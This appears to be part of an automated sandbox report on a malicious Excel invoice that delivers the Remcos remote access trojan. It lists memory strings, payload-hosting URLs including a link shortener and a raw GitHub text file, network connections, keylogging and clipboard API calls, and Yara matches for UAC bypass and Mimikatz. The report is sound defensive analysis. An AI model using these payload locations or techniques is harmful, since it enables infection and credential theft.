                    Source: powershell.exe, 00000010.00000002.489646290.0000000004EC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
                    Source: powershell.exe, 0000000D.00000002.492245268.000000000248C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.486492104.0000000002411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/_h/975a7d20/webcore/externalscripts/jquery/jquer
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/css/f15f847b-3b9d03a9/directi
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-7e75174a/directio
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-80c466c0/directio
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/6b/7fe9d7.woff
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/c6/cfdbd9.png
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/64bfc5b6/webcore/externalscripts/oneTrust/de-
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/a1438951/webcore/externalscripts/oneTrust/ski
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/css/f60532dd-8d94f807/directi
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-2923b6c2/directio
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-a12f0134/directio
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/21/241a2c.woff
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA2oHEB.img?h=16&w=16&m
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42Hq5.img?h=16&w=16&m
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42eYr.img?h=16&w=16&m
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42pjY.img?h=16&w=16&m
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6K5wX.img?h=16&w=16&m
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6pevu.img?h=16&w=16&m
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8I0Dg.img?h=16&w=16&m
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8uJZv.img?h=16&w=16&m
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHxwMU.img?h=16&w=16&m
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAJhH73.img?h=16&w=16&m
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAgi0nZ.img?h=16&w=16&m
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAhvyvD.img?h=16&w=16&m
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtB8UA.img?h=166&w=310
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBduP.img?h=75&w=100&
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBnuN.img?h=166&w=310
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCLD9.img?h=368&w=522
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCr7K.img?h=75&w=100&
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCzBA.img?h=250&w=300
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXtPP.img?h=16&w=16&m
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzl6aj.img?h=16&w=16&m
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17cJeH.img?h=250&w=30
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dAYk.img?h=75&w=100
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dJEo.img?h=75&w=100
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dLTg.img?h=166&w=31
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dOHE.img?h=333&w=31
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dWNo.img?h=166&w=31
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dtuY.img?h=333&w=31
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e0XT.img?h=166&w=31
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e3cA.img?h=75&w=100
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e5NB.img?h=75&w=100
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e7Ai.img?h=250&w=30
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e9Q0.img?h=166&w=31
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eeI9.img?h=75&w=100
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17ejTJ.img?h=75&w=100
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBYMDHp.img?h=27&w=27&m
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
                    Source: powershell.exe, 00000010.00000002.489646290.0000000004EC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                    Source: powershell.exe, 00000010.00000002.489646290.0000000004EC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                    Source: RegAsm.exe, RegAsm.exe, 00000016.00000002.493002078.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                    Source: RegAsm.exe, RegAsm.exe, 00000016.00000002.493220079.0000000000459000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000016.00000002.493002078.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                    Source: RegAsm.exe, 00000016.00000002.492857481.000000000026C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/sK
                    Source: RegAsm.exe, 00000016.00000002.493002078.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                    Source: RegAsm.exe, 00000016.00000002.493002078.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://www.msn.com/
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://www.msn.com/?ocid=iehp
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://www.msn.com/advertisement.ad.js
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
                    Source: RegAsm.exe, 00000014.00000002.496088283.00000000002DF000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                    Source: RegAsm.exe, 00000016.00000002.493002078.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                    Source: bhvE936.tmp.20.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
                    Source: bhvE936.tmp.20.drString found in binary or memory: https://contextual.media.net/
                    Source: bhvE936.tmp.20.drString found in binary or memory: https://contextual.media.net/8/nrrV73987.js
                    Source: bhvE936.tmp.20.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
                    Source: bhvE936.tmp.20.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
                    Source: bhvE936.tmp.20.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
                    Source: powershell.exe, 00000010.00000002.487113772.0000000003439000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000010.00000002.487113772.0000000003439000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000010.00000002.487113772.0000000003439000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: bhvE936.tmp.20.drString found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
                    Source: bhvE936.tmp.20.drString found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
                    Source: bhvE936.tmp.20.drString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
                    Source: bhvE936.tmp.20.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                    Source: bhvE936.tmp.20.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                    Source: RegAsm.exeString found in binary or memory: https://login.yahoo.com/config/login
                    Source: m2g.me.url.4.drString found in binary or memory: https://m2g.me/
                    Source: invoice_45009.xls, d1a1.url.4.drString found in binary or memory: https://m2g.me/d1a1
                    Source: 33930000.0.dr, ~DFC909180303CC471C.TMP.0.drString found in binary or memory: https://m2g.me/d1a1yX
                    Source: powershell.exe, 00000010.00000002.487113772.0000000003439000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: bhvE936.tmp.20.drString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
                    Source: powershell.exe, 00000010.00000002.486492104.000000000254A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                    Source: powershell.exe, 00000010.00000002.486492104.000000000254A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.489646290.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.486492104.000000000292E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
                    Source: bhvE936.tmp.20.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
                    Source: powershell.exe, 00000010.00000002.489646290.0000000004EC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                    Source: bhvE936.tmp.20.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                    Source: RegAsm.exe, 00000014.00000002.496507955.00000000025B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                    Source: bhvE936.tmp.20.drString found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
                    Source: RegAsm.exe, RegAsm.exe, 00000016.00000002.493002078.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: RegAsm.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                    Source: bhvE936.tmp.20.drString found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
                    Source: unknownHTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49163 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49165 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,0000000019_2_0040A2F3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,19_2_0040B749
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,19_2_004168FC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,20_2_0040987A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,20_2_004098E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,21_2_00406DFC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,21_2_00406E9F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,22_2_004068B5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,22_2_004072B5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,19_2_0040B749
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,19_2_0040A41B
                    Source: Yara matchFile source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.powershell.exe.3ac0b60.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.powershell.exe.3ac0b60.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.487113772.0000000003439000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.487113772.0000000003659000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2880, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1436, type: MEMORYSTR

                    E-Banking Fraud

                    barindex
                    Source: Yara matchFile source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.powershell.exe.3ac0b60.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.powershell.exe.3ac0b60.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000013.00000002.642861861.000000000241E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.642709056.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.642581330.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.642581330.0000000000B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.487113772.0000000003439000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.487113772.0000000003659000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2880, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1436, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0041CA73 SystemParametersInfoW,19_2_0041CA73

                    System Summary

                    barindex
                    Source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 16.2.powershell.exe.3ac0b60.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 16.2.powershell.exe.3ac0b60.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 16.2.powershell.exe.3ac0b60.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 16.2.powershell.exe.3ac0b60.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 16.2.powershell.exe.3ac0b60.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000010.00000002.487113772.0000000003439000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000010.00000002.487113772.0000000003659000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 3120, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 2880, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 2880, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                    Source: Process Memory Space: powershell.exe PID: 2880, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: RegAsm.exe PID: 1436, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nicesweetthingsentiretimesheneedtogetmebackwithverynicepersonwhowillingtogetniceworthfulthingsalwaysinhandsweetnesshaveforthebiscoutwhichieatedwith____verynic[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B5BBC488.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                    Source: invoice_45009.xlsOLE: Microsoft Excel 2007+
                    Source: invoice_45009.xlsOLE: Microsoft Excel 2007+
                    Source: 33930000.0.drOLE: Microsoft Excel 2007+
                    Source: 33930000.0.drOLE: Microsoft Excel 2007+
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\d1a1.urlJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\m2g.me.urlJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
